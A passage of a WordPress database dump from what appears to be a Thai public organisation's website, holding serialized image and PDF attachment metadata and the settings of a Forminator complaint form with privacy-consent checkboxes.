esize\";i:95471;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:316039;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_14-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22610;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4093,1473,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1.jpg'),
(4094,1473,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_15-1.jpg\";s:8:\"filesize\";i:593846;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17419;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165188;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8652;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:97765;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:328675;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_15-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22765;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4095,1474,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1.jpg'),
(4096,1474,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_16-1.jpg\";s:8:\"filesize\";i:574974;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:17590;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:162295;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:8735;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:96554;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:320840;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_16-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:22777;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4097,1475,'_wp_attached_file','2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1.jpg'),
(4098,1475,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1706;s:6:\"height\";i:960;s:4:\"file\";s:68:\"2025/06/LINE_ALBUM_วันสุนทรภู่_250626_17-1.jpg\";s:8:\"filesize\";i:576722;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1-300x169.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:169;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:18418;}s:5:\"large\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1-1024x576.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:576;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:165099;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:9395;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1-768x432.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:432;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:99515;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:69:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1-1536x864.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:864;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:323817;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:68:\"LINE_ALBUM_วันสุนทรภู่_250626_17-1-360x189.jpg\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:24120;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4100,1457,'_thumbnail_id','1458'),
(4101,1457,'_edit_last','1'),
(4102,1457,'title_style','default'),
(4103,1457,'_title_style','field_5d1a0217cf408'),
(4104,1457,'related',''),
(4105,1457,'_related','field_603b51c3e183e'),
(4106,1476,'title_style','default'),
(4107,1476,'_title_style','field_5d1a0217cf408'),
(4108,1476,'related',''),
(4109,1476,'_related','field_603b51c3e183e'),
(4110,1477,'_edit_lock','1750922215:1'),
(4111,1478,'_wp_attached_file','2025/06/9-68.png'),
(4112,1478,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:16:\"2025/06/9-68.png\";s:8:\"filesize\";i:4389457;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:16:\"9-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:135061;}s:5:\"large\";a:5:{s:4:\"file\";s:17:\"9-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1189477;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:16:\"9-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:48380;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:17:\"9-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1316064;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:18:\"9-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:2379083;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:16:\"9-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:109781;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4114,1477,'_edit_last','1'),
(4115,1477,'title_style','default'),
(4116,1477,'_title_style','field_5d1a0217cf408'),
(4117,1477,'related',''),
(4118,1477,'_related','field_603b51c3e183e'),
(4119,1479,'title_style','default'),
(4120,1479,'_title_style','field_5d1a0217cf408'),
(4121,1479,'related',''),
(4122,1479,'_related','field_603b51c3e183e'),
(4123,1480,'_edit_lock','1750922312:1'),
(4124,1481,'_wp_attached_file','2025/06/10-68.png'),
(4125,1481,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1414;s:6:\"height\";i:2000;s:4:\"file\";s:17:\"2025/06/10-68.png\";s:8:\"filesize\";i:3100497;s:5:\"sizes\";a:6:{s:6:\"medium\";a:5:{s:4:\"file\";s:17:\"10-68-212x300.png\";s:5:\"width\";i:212;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:109817;}s:5:\"large\";a:5:{s:4:\"file\";s:18:\"10-68-724x1024.png\";s:5:\"width\";i:724;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:911361;}s:9:\"thumbnail\";a:5:{s:4:\"file\";s:17:\"10-68-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:46079;}s:12:\"medium_large\";a:5:{s:4:\"file\";s:18:\"10-68-768x1086.png\";s:5:\"width\";i:768;s:6:\"height\";i:1086;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1012601;}s:9:\"1536x1536\";a:5:{s:4:\"file\";s:19:\"10-68-1086x1536.png\";s:5:\"width\";i:1086;s:6:\"height\";i:1536;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:1862722;}s:14:\"post-thumbnail\";a:5:{s:4:\"file\";s:17:\"10-68-360x189.png\";s:5:\"width\";i:360;s:6:\"height\";i:189;s:9:\"mime-type\";s:9:\"image/png\";s:8:\"filesize\";i:121236;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),
(4127,1480,'_thumbnail_id','1481'),
(4128,1480,'_edit_last','1'),
(4129,1480,'title_style','default'),
(4130,1480,'_title_style','field_5d1a0217cf408'),
(4131,1480,'related',''),
(4132,1480,'_related','field_603b51c3e183e'),
(4133,1482,'title_style','default'),
(4134,1482,'_title_style','field_5d1a0217cf408'),
(4135,1482,'related',''),
(4136,1482,'_related','field_603b51c3e183e'),
(4138,1477,'_thumbnail_id','1478'),
(4141,1484,'title_style','hidden'),
(4142,1484,'_title_style','field_5d1a0217cf408'),
(4143,1485,'title_style','hidden'),
(4144,1485,'_title_style','field_5d1a0217cf408'),
(4145,1486,'title_style','default'),
(4146,1486,'_title_style','field_5d1a0217cf408'),
(4148,1488,'title_style','default'),
(4149,1488,'_title_style','field_5d1a0217cf408'),
(4150,1489,'_wp_attached_file','2025/06/แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ.pdf'),
(4151,1489,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:224910;}'),
(4152,1490,'title_style','default'),
(4153,1490,'_title_style','field_5d1a0217cf408'),
(4154,1491,'title_style','default'),
(4155,1491,'_title_style','field_5d1a0217cf408'),
(4156,1492,'title_style','hidden'),
(4157,1492,'_title_style','field_5d1a0217cf408'),
(4159,1494,'title_style','hidden'),
(4160,1494,'_title_style','field_5d1a0217cf408'),
(4161,1495,'title_style','hidden'),
(4162,1495,'_title_style','field_5d1a0217cf408'),
(4163,1496,'title_style','hidden'),
(4164,1496,'_title_style','field_5d1a0217cf408'),
(4165,1497,'_wp_attached_file','2025/07/การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน.pdf'),
(4166,1497,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:4563519;}'),
(4167,1498,'title_style','default'),
(4168,1498,'_title_style','field_5d1a0217cf408'),
(4169,1499,'_wp_attached_file','2025/07/การบริหารและพัฒนาทรัพยากรบุคคล.pdf'),
(4170,1499,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:1624804;}'),
(4171,1500,'title_style','default'),
(4172,1500,'_title_style','field_5d1a0217cf408'),
(4174,1502,'_edit_lock','1751875530:1'),
(4175,1503,'_wp_attached_file','2025/07/ประมวลจริยธรรมและการขับเคลื่อนจริยธรรม.pdf'),
(4176,1503,'_wp_attachment_metadata','a:1:{s:8:\"filesize\";i:6903521;}'),
(4177,1502,'_edit_last','1'),
(4178,1502,'title_style','hidden'),
(4179,1502,'_title_style','field_5d1a0217cf408'),
(4180,1504,'title_style','default'),
(4181,1504,'_title_style','field_5d1a0217cf408'),
(4182,1505,'title_style','hidden'),
(4183,1505,'_title_style','field_5d1a0217cf408'),
(4184,1506,'forminator_form_meta','a:6:{s:6:\"fields\";a:7:{i:0;a:17:{s:2:\"id\";s:6:\"name-1\";s:10:\"element_id\";s:6:\"name-1\";s:7:\"form_id\";s:26:\"wrapper-1511347711918-1669\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:4:\"name\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:27:\"ชื่อ - สกุล\";s:12:\"prefix_label\";s:6:\"Prefix\";s:11:\"fname_label\";s:10:\"First Name\";s:11:\"mname_label\";s:11:\"Middle Name\";s:11:\"lname_label\";s:9:\"Last Name\";s:10:\"wrapper_id\";s:26:\"wrapper-1511347711918-1669\";s:11:\"description\";s:0:\"\";s:10:\"conditions\";a:0:{}s:13:\"multiple_name\";s:5:\"false\";s:16:\"required_message\";s:64:\"กรุณา ใส่ ชื่อ-สกุล จริง\";}i:1;a:15:{s:2:\"id\";s:7:\"email-1\";s:10:\"element_id\";s:7:\"email-1\";s:7:\"form_id\";s:26:\"wrapper-1511347712118-1739\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:5:\"email\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:13:\"Email Address\";s:10:\"validation\";s:0:\"\";s:15:\"validation_text\";s:0:\"\";s:10:\"wrapper_id\";s:26:\"wrapper-1511347712118-1739\";s:10:\"conditions\";a:0:{}s:13:\"confirm-email\";s:0:\"\";s:11:\"description\";s:0:\"\";s:16:\"required_message\";s:45:\"กรุณากรอกข้อมูล\";}i:2;a:17:{s:2:\"id\";s:7:\"phone-1\";s:10:\"element_id\";s:7:\"phone-1\";s:7:\"form_id\";s:26:\"wrapper-1311247712118-1194\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:5:\"phone\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:105:\"เบอร์โทรศัพท์ที่สามารถติดต่อกลับได้\";s:10:\"validation\";s:15:\"character_limit\";s:21:\"phone_validation_type\";s:8:\"standard\";s:15:\"validation_text\";s:0:\"\";s:10:\"wrapper_id\";s:26:\"wrapper-1311247712118-1194\";s:10:\"conditions\";a:0:{}s:11:\"description\";s:10:\"081xxxxxxx\";s:22:\"phone_national_country\";s:2:\"th\";s:27:\"phone_international_country\";s:2:\"th\";s:16:\"required_message\";s:132:\"กรุณากรอกเบอร์โทรศัพท์ที่สามารถติดต่อกลับได้\";}i:3;a:26:{s:2:\"id\";s:6:\"name-2\";s:10:\"element_id\";s:6:\"name-2\";s:7:\"form_id\";s:17:\"wrapper-5176-1288\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:4:\"name\";s:7:\"options\";a:0:{}s:4:\"cols\";s:2:\"12\";s:10:\"conditions\";a:0:{}s:10:\"wrapper_id\";s:17:\"wrapper-5176-1288\";s:11:\"field_label\";s:45:\"เรื่องร้องเรียน\";s:12:\"prefix_label\";s:6:\"Prefix\";s:11:\"fname_label\";s:10:\"First Name\";s:11:\"mname_label\";s:11:\"Middle Name\";s:11:\"lname_label\";s:9:\"Last Name\";s:6:\"prefix\";s:4:\"true\";s:5:\"fname\";s:4:\"true\";s:5:\"mname\";s:4:\"true\";s:5:\"lname\";s:4:\"true\";s:16:\"required_message\";s:57:\"ระบุเรื่องร้องเรียน\";s:23:\"prefix_required_message\";s:19:\"Prefix is required.\";s:22:\"fname_required_message\";s:23:\"First Name is required.\";s:22:\"mname_required_message\";s:24:\"Middle Name is required.\";s:22:\"lname_required_message\";s:22:\"Last Name is required.\";s:14:\"layout_columns\";s:1:\"2\";s:13:\"multiple_name\";s:5:\"false\";s:8:\"required\";s:1:\"1\";}i:4;a:14:{s:2:\"id\";s:10:\"textarea-1\";s:10:\"element_id\";s:10:\"textarea-1\";s:7:\"form_id\";s:26:\"wrapper-1988247712118-9871\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:8:\"textarea\";s:4:\"cols\";s:2:\"12\";s:8:\"required\";s:1:\"1\";s:11:\"field_label\";s:96:\"กรอกข้อมูลรายละเอียดการร้องเรียน\";s:10:\"input_type\";s:9:\"paragraph\";s:5:\"limit\";s:3:\"500\";s:10:\"limit_type\";s:5:\"words\";s:10:\"wrapper_id\";s:26:\"wrapper-1988247712118-9871\";s:10:\"conditions\";a:0:{}s:16:\"required_message\";s:45:\"กรุณากรอกข้อมูล\";}i:5;a:15:{s:2:\"id\";s:8:\"upload-1\";s:10:\"element_id\";s:8:\"upload-1\";s:7:\"form_id\";s:17:\"wrapper-5139-4132\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:6:\"upload\";s:7:\"options\";a:0:{}s:4:\"cols\";s:2:\"12\";s:10:\"conditions\";a:0:{}s:10:\"wrapper_id\";s:17:\"wrapper-5139-4132\";s:11:\"field_label\";s:29:\"Upload file (ถ้ามี)\";s:9:\"filetypes\";a:99:{i:0;s:9:\"all-image\";i:1;s:9:\"all-video\";i:2;s:12:\"all-document\";i:3;s:9:\"all-audio\";i:4;s:11:\"all-archive\";i:5;s:8:\"all-text\";i:6;s:15:\"all-spreadsheet\";i:7;s:15:\"all-interactive\";i:8;s:12:\"jpg|jpeg|jpe\";i:9;s:3:\"gif\";i:10;s:3:\"png\";i:11;s:3:\"bmp\";i:12;s:8:\"tiff|tif\";i:13;s:4:\"webp\";i:14;s:4:\"avif\";i:15;s:3:\"ico\";i:16;s:4:\"heic\";i:17;s:4:\"heif\";i:18;s:5:\"heics\";i:19;s:5:\"heifs\";i:20;s:7:\"asf|asx\";i:21;s:3:\"wmv\";i:22;s:3:\"wmx\";i:23;s:2:\"wm\";i:24;s:3:\"avi\";i:25;s:4:\"divx\";i:26;s:3:\"flv\";i:27;s:6:\"mov|qt\";i:28;s:12:\"mpeg|mpg|mpe\";i:29;s:7:\"mp4|m4v\";i:30;s:3:\"ogv\";i:31;s:4:\"webm\";i:32;s:3:\"mkv\";i:33;s:8:\"3gp|3gpp\";i:34;s:8:\"3g2|3gp2\";i:35;s:18:\"txt|asc|c|cc|h|srt\";i:36;s:3:\"csv\";i:37;s:3:\"tsv\";i:38;s:3:\"ics\";i:39;s:3:\"rtx\";i:40;s:3:\"vtt\";i:41;s:11:\"mp3|m4a|m4b\";i:42;s:3:\"aac\";i:43;s:6:\"ra|ram\";i:44;s:9:\"wav|x-wav\";i:45;s:7:\"ogg|oga\";i:46;s:4:\"flac\";i:47;s:8:\"mid|midi\";i:48;s:3:\"wma\";i:49;s:3:\"wax\";i:50;s:3:\"mka\";i:51;s:3:\"rtf\";i:52;s:3:\"pdf\";i:53;s:5:\"class\";i:54;s:3:\"tar\";i:55;s:3:\"zip\";i:56;s:7:\"gz|gzip\";i:57;s:2:\"7z\";i:58;s:3:\"psd\";i:59;s:3:\"xcf\";i:60;s:3:\"doc\";i:61;s:11:\"pot|pps|ppt\";i:62;s:3:\"wri\";i:63;s:15:\"xla|xls|xlt|xlw\";i:64;s:3:\"mdb\";i:65;s:3:\"mpp\";i:66;s:4:\"docx\";i:67;s:4:\"docm\";i:68;s:4:\"dotx\";i:69;s:4:\"dotm\";i:70;s:4:\"xlsx\";i:71;s:4:\"xlsm\";i:72;s:4:\"xlsb\";i:73;s:4:\"xltx\";i:74;s:4:\"xltm\";i:75;s:4:\"xlam\";i:76;s:4:\"pptx\";i:77;s:4:\"pptm\";i:78;s:4:\"ppsx\";i:79;s:4:\"ppsm\";i:80;s:4:\"potx\";i:81;s:4:\"potm\";i:82;s:4:\"ppam\";i:83;s:4:\"sldx\";i:84;s:4:\"sldm\";i:85;s:28:\"onetoc|onetoc2|onetmp|onepkg\";i:86;s:4:\"oxps\";i:87;s:3:\"xps\";i:88;s:3:\"odt\";i:89;s:3:\"odp\";i:90;s:3:\"ods\";i:91;s:3:\"odg\";i:92;s:3:\"odc\";i:93;s:3:\"odb\";i:94;s:3:\"odf\";i:95;s:6:\"wp|wpd\";i:96;s:3:\"key\";i:97;s:7:\"numbers\";i:98;s:5:\"pages\";}s:9:\"file-type\";s:6:\"single\";s:10:\"file-limit\";s:9:\"unlimited\";s:12:\"upload-limit\";s:1:\"8\";s:8:\"filesize\";s:2:\"MB\";}i:6;a:18:{s:2:\"id\";s:10:\"checkbox-1\";s:10:\"element_id\";s:10:\"checkbox-1\";s:7:\"form_id\";s:17:\"wrapper-5553-3896\";s:12:\"parent_group\";s:0:\"\";s:4:\"type\";s:8:\"checkbox\";s:7:\"options\";a:4:{i:0;a:6:{s:5:\"label\";s:138:\"ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น\";s:5:\"value\";s:138:\"ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:1:\"1\";s:3:\"key\";s:9:\"2066-5314\";s:5:\"error\";s:0:\"\";}i:1;a:6:{s:5:\"label\";s:195:\"ข้อมูลผู้ร้องเรียนจะถูกเข้าถึงโดยเจ้าหน้าที่ที่เกี่ยวข้องเท่านั้น\";s:5:\"value\";s:60:\"ข้อมูลผู้ร้องเรียนจะ\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:1:\"1\";s:3:\"key\";s:9:\"2739-1920\";s:5:\"error\";s:0:\"\";}i:2;a:6:{s:5:\"label\";s:172:\"ข้อมูลจะถูกเก็บไว้เป็นระยเวลา 1 ปี หลังจากดำเนินการเสร็จสิ้น\";s:5:\"value\";s:96:\"ข้อมูลจะถูกเก็บไว้เป็นระยเวลา-1-ปี\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:1:\"1\";s:3:\"key\";s:9:\"5353-6721\";s:5:\"error\";s:0:\"\";}i:3;a:6:{s:5:\"label\";s:159:\"ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ\";s:5:\"value\";s:159:\"ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ\";s:5:\"limit\";s:0:\"\";s:7:\"default\";s:0:\"\";s:3:\"key\";s:9:\"6066-3633\";s:5:\"error\";s:0:\"\";}}s:4:\"cols\";s:2:\"12\";s:10:\"conditions\";a:0:{}s:10:\"wrapper_id\";s:17:\"wrapper-5553-3896\";s:15:\"hidden_behavior\";s:4:\"zero\";s:10:\"value_type\";s:8:\"checkbox\";s:11:\"field_label\";s:63:\"นโยบายความเป็นส่วนตัว\";s:6:\"layout\";s:8:\"vertical\";s:19:\"options_bulk_editor\";s:1136:\"ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น;ข้อมูลส่วนบุคคลจะใช้เพื่อการติดต่อกลับเท่านั้น; 1\nข้อมูลผู้ร้องเรียนจะถูกเข้าถึงโดยเจ้าหน้าที่ที่เกี่ยวข้องเท่านั้น;ข้อมูลผู้ร้องเรียนจะ; 1\nข้อมูลจะถูกเก็บไว้เป็นระยเวลา 1 ปี หลังจากดำเนินการเสร็จสิ้น;ข้อมูลจะถูกเก็บไว้เป็นระยเวลา-1-ปี; 1\nข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ;ข้าพเจ้าขอรับรองว่าข้อมูลข้างต้นเป็นความจริงทุกประการ; 0\";s:11:\"description\";s:276:\"ข้อมูลของท่านจะถูกเก็บไว้เป็นความลับ ตาม พรบ.คุ้มครองข้อมูลส่วนบุคคล พ.ศ. 2562 โดยมีรายละเอียดดังนี้\";s:16:\"options_expanded\";s:0:\"\";s:8:\"required\";s:1:\"1\";s:16:\"required_message\";s:0:\"\";}}s:8:\"settings\";a:100:{s:17:\"pagination-header\";s:3:\"nav\";s:14:\"paginationData\";a:2:{s:24:\"pagination-header-design\";s:4:\"show\";s:17:\"pagination-header\";s:3:\"nav\";}s:8:\"formName\";s:105:\"ช่องทางการแจ้งเรื่องร้องเรียนทั่วไป\";s:7:\"version\";s:6:\"1.44.1\";s:17:\"form-border-style\";s:4:\"none\";s:12:\"form-padding\";s:0:\"\";s:11:\"form-border\";s:0:\"\";s:12:\"fields-style\";s:4:\"open\";s:16:\"field-image-size\";s:6:\"custom\";s:10:\"validation\";s:9:\"on_submit\";s:18:\"akismet-protection\";s:1:\"1\";s:10:\"form-style\";s:7:\"default\";s:13:\"form-substyle\";s:7:\"default\";s:11:\"enable-ajax\";s:4:\"true\";s:9:\"autoclose\";s:4:\"true\";s:20:\"submission-indicator\";s:4:\"show\";s:15:\"indicator-label\";s:13:\"Submitting...\";s:18:\"cform-color-option\";s:5:\"theme\";s:22:\"basic-field-image-size\";s:6:\"custom\";s:18:\"basic-fields-style\";s:4:\"open\";s:17:\"store_submissions\";s:1:\"1\";s:20:\"description-position\";s:5:\"above\";s:9:\"form-type\";s:7:\"default\";s:20:\"submission-behaviour\";s:18:\"behaviour-thankyou\";s:16:\"thankyou-message\";s:57:\"Thank you for contacting us, we will be in touch shortly.\";s:10:\"submitData\";a:2:{s:18:\"custom-submit-text\";s:27:\"ส่งเรื่อง\";s:27:\"custom-invalid-form-message\";s:53:\"Error: Your form is not valid, please fix the 